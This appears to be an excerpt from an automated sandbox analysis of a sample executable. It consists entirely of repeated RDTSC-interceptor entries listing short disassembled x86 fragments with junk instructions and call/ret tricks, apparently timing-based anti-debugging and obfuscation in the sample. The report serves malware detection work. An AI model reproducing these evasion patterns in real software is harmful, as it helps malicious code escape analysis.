                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BD1A8 second address: 11BD258 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b or dword ptr [ebp+122D2A7Ch], esi 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007F3FAC75ECC8h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 0000001Dh 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D19CCh], ebx 0x00000033 call 00007F3FAC75ECC9h 0x00000038 jmp 00007F3FAC75ECD0h 0x0000003d push eax 0x0000003e jl 00007F3FAC75ECD4h 0x00000044 push eax 0x00000045 jmp 00007F3FAC75ECCCh 0x0000004a pop eax 0x0000004b mov eax, dword ptr [esp+04h] 0x0000004f push eax 0x00000050 push edi 0x00000051 jmp 00007F3FAC75ECD4h 0x00000056 pop edi 0x00000057 pop eax 0x00000058 mov eax, dword ptr [eax] 0x0000005a jc 00007F3FAC75ECD8h 0x00000060 jc 00007F3FAC75ECD2h 0x00000066 jmp 00007F3FAC75ECCCh 0x0000006b mov dword ptr [esp+04h], eax 0x0000006f push eax 0x00000070 push edx 0x00000071 jl 00007F3FAC75ECC8h 0x00000077 push eax 0x00000078 pop eax 0x00000079 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BD258 second address: 11BD25E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BD25E second address: 11BD262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BD262 second address: 11BD2CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 jmp 00007F3FACB96B2Bh 0x0000000e sbb si, 4D0Bh 0x00000013 push 00000003h 0x00000015 jmp 00007F3FACB96B34h 0x0000001a push 00000000h 0x0000001c call 00007F3FACB96B2Fh 0x00000021 jg 00007F3FACB96B28h 0x00000027 mov ch, 18h 0x00000029 pop esi 0x0000002a push 00000003h 0x0000002c xor dh, FFFFFFF3h 0x0000002f call 00007F3FACB96B29h 0x00000034 push ebx 0x00000035 push ebx 0x00000036 jmp 00007F3FACB96B2Bh 0x0000003b pop ebx 0x0000003c pop ebx 0x0000003d push eax 0x0000003e push esi 0x0000003f push ecx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BD2CD second address: 11BD338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b jmp 00007F3FAC75ECD3h 0x00000010 jmp 00007F3FAC75ECD7h 0x00000015 popad 0x00000016 mov eax, dword ptr [eax] 0x00000018 pushad 0x00000019 jmp 00007F3FAC75ECD3h 0x0000001e jmp 00007F3FAC75ECD6h 0x00000023 popad 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 push ecx 0x00000029 push ebx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BD338 second address: 11BD390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 pop eax 0x00000007 mov dword ptr [ebp+122D217Ch], ebx 0x0000000d lea ebx, dword ptr [ebp+1244F07Bh] 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007F3FACB96B28h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d add cl, 00000029h 0x00000030 xchg eax, ebx 0x00000031 push eax 0x00000032 jmp 00007F3FACB96B37h 0x00000037 pop eax 0x00000038 push eax 0x00000039 push ecx 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BD5B1 second address: 11BD5F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F3FAC75ECCFh 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jns 00007F3FAC75ECD2h 0x00000015 mov eax, dword ptr [eax] 0x00000017 pushad 0x00000018 jmp 00007F3FAC75ECCDh 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BD5F0 second address: 11BD5F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BD5F4 second address: 11BD60C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3FAC75ECC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 je 00007F3FAC75ECCCh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DBDF3 second address: 11DBE29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACB96B2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F3FACB96B36h 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 jno 00007F3FACB96B28h 0x00000017 pushad 0x00000018 push edi 0x00000019 pop edi 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DBFF6 second address: 11DBFFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DBFFC second address: 11DC00E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACB96B2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DC814 second address: 11DC83B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 jmp 00007F3FAC75ECD5h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pushad 0x00000013 popad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 pop ebx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DC9C8 second address: 11DCA12 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F3FACB96B2Bh 0x00000008 jg 00007F3FACB96B26h 0x0000000e pop edi 0x0000000f jnc 00007F3FACB96B33h 0x00000015 jmp 00007F3FACB96B2Dh 0x0000001a pop edx 0x0000001b pop eax 0x0000001c pushad 0x0000001d jmp 00007F3FACB96B2Eh 0x00000022 jmp 00007F3FACB96B2Eh 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DCB84 second address: 11DCB8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DCB8A second address: 11DCB90 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DCE2E second address: 11DCE32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DCE32 second address: 11DCE38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DCE38 second address: 11DCE3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DCE3E second address: 11DCE52 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F3FACB96B26h 0x0000000e jp 00007F3FACB96B26h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DCE52 second address: 11DCE72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FAC75ECD6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DCE72 second address: 11DCE86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F3FACB96B2Bh 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DCFEC second address: 11DD003 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FAC75ECD3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DD003 second address: 11DD023 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACCA44BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push edx 0x0000000f pop edx 0x00000010 pop ebx 0x00000011 pushad 0x00000012 push esi 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DD023 second address: 11DD02E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F3FAC813906h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DD780 second address: 11DD7A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F3FACCA44C7h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DD7A3 second address: 11DD7A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DD922 second address: 11DD941 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3FACCA44C5h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DDAA2 second address: 11DDAA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DDAA7 second address: 11DDAB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F3FACCA44B6h 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DDC3F second address: 11DDC54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3FAC813910h 0x00000009 pop ebx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DDC54 second address: 11DDC5E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3FACCA44BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DDC5E second address: 11DDC66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DDC66 second address: 11DDC6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E0A16 second address: 11E0A37 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F3FAC813916h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B4486 second address: 11B448C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B448C second address: 11B4490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B4490 second address: 11B4494 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B4494 second address: 11B449A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B449A second address: 11B44CE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3FACCA44C7h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F3FACCA44C7h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B44CE second address: 11B44D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B44D2 second address: 11B4520 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACCA44C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jo 00007F3FACCA44CCh 0x00000012 jmp 00007F3FACCA44C6h 0x00000017 jmp 00007F3FACCA44C0h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B4520 second address: 11B4526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E7FE4 second address: 11E7FF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACCA44BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E8162 second address: 11E8166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E82FC second address: 11E830A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACCA44BAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E830A second address: 11E8315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E8315 second address: 11E831B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ECBB0 second address: 11ECBB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ECBB6 second address: 11ECC05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACCA44BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 447795CAh 0x00000010 jp 00007F3FACCA44CFh 0x00000016 call 00007F3FACCA44B9h 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F3FACCA44BBh 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ECC05 second address: 11ECC0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F3FAC813906h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ECC0F second address: 11ECC21 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a je 00007F3FACCA44BCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ED0AB second address: 11ED0B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ED0B0 second address: 11ED0C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F3FACCA44B6h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pushad 0x00000013 popad 0x00000014 pop edi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ED7DD second address: 11ED7E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ED8BF second address: 11ED8C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EDB1F second address: 11EDB29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F3FAC813906h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EDB29 second address: 11EDB3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007F3FACCA44B6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EDCF3 second address: 11EDCF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EDD73 second address: 11EDD77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EDD77 second address: 11EDDAE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3FAC813906h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F3FAC813908h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 push eax 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EDDAE second address: 11EDDB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EE200 second address: 11EE206 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EE206 second address: 11EE220 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F3FACCA44BEh 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EE220 second address: 11EE229 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EE229 second address: 11EE2BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edx 0x0000000a call 00007F3FACCA44B8h 0x0000000f pop edx 0x00000010 mov dword ptr [esp+04h], edx 0x00000014 add dword ptr [esp+04h], 00000014h 0x0000001c inc edx 0x0000001d push edx 0x0000001e ret 0x0000001f pop edx 0x00000020 ret 0x00000021 jc 00007F3FACCA44CBh 0x00000027 call 00007F3FACCA44BEh 0x0000002c mov esi, dword ptr [ebp+122D1AB1h] 0x00000032 pop edi 0x00000033 push 00000000h 0x00000035 push edx 0x00000036 pushad 0x00000037 mov dword ptr [ebp+122D29CFh], edi 0x0000003d and ebx, dword ptr [ebp+122D2C80h] 0x00000043 popad 0x00000044 pop edi 0x00000045 push 00000000h 0x00000047 push 00000000h 0x00000049 push esi 0x0000004a call 00007F3FACCA44B8h 0x0000004f pop esi 0x00000050 mov dword ptr [esp+04h], esi 0x00000054 add dword ptr [esp+04h], 0000001Bh 0x0000005c inc esi 0x0000005d push esi 0x0000005e ret 0x0000005f pop esi 0x00000060 ret 0x00000061 xchg eax, ebx 0x00000062 pushad 0x00000063 pushad 0x00000064 jmp 00007F3FACCA44C7h 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EE2BA second address: 11EE2DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F3FAC813919h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F090C second address: 11F0916 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F3FACCA44B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F0916 second address: 11F0987 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3FAC813916h 0x00000008 jmp 00007F3FAC813910h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 mov si, 0A68h 0x00000014 and esi, 17F8A500h 0x0000001a push 00000000h 0x0000001c mov si, C176h 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push ebx 0x00000025 call 00007F3FAC813908h 0x0000002a pop ebx 0x0000002b mov dword ptr [esp+04h], ebx 0x0000002f add dword ptr [esp+04h], 00000017h 0x00000037 inc ebx 0x00000038 push ebx 0x00000039 ret 0x0000003a pop ebx 0x0000003b ret 0x0000003c and esi, 722E8BFBh 0x00000042 call 00007F3FAC813911h 0x00000047 mov edi, dword ptr [ebp+122D2CB4h] 0x0000004d pop esi 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F0987 second address: 11F098B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F098B second address: 11F098F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F098F second address: 11F0995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F0995 second address: 11F099F instructions: 0x00000000 rdtsc 0x00000002 je 00007F3FAC81390Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F1507 second address: 11F1565 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3FACCA44B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b nop 0x0000000c mov si, 9463h 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F3FACCA44B8h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000016h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ecx 0x00000031 call 00007F3FACCA44B8h 0x00000036 pop ecx 0x00000037 mov dword ptr [esp+04h], ecx 0x0000003b add dword ptr [esp+04h], 0000001Ch 0x00000043 inc ecx 0x00000044 push ecx 0x00000045 ret 0x00000046 pop ecx 0x00000047 ret 0x00000048 stc 0x00000049 xchg eax, ebx 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F1565 second address: 11F1569 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F1569 second address: 11F1580 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACCA44C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F1580 second address: 11F15BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FAC813914h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F3FAC81391Fh 0x00000012 rdtsc
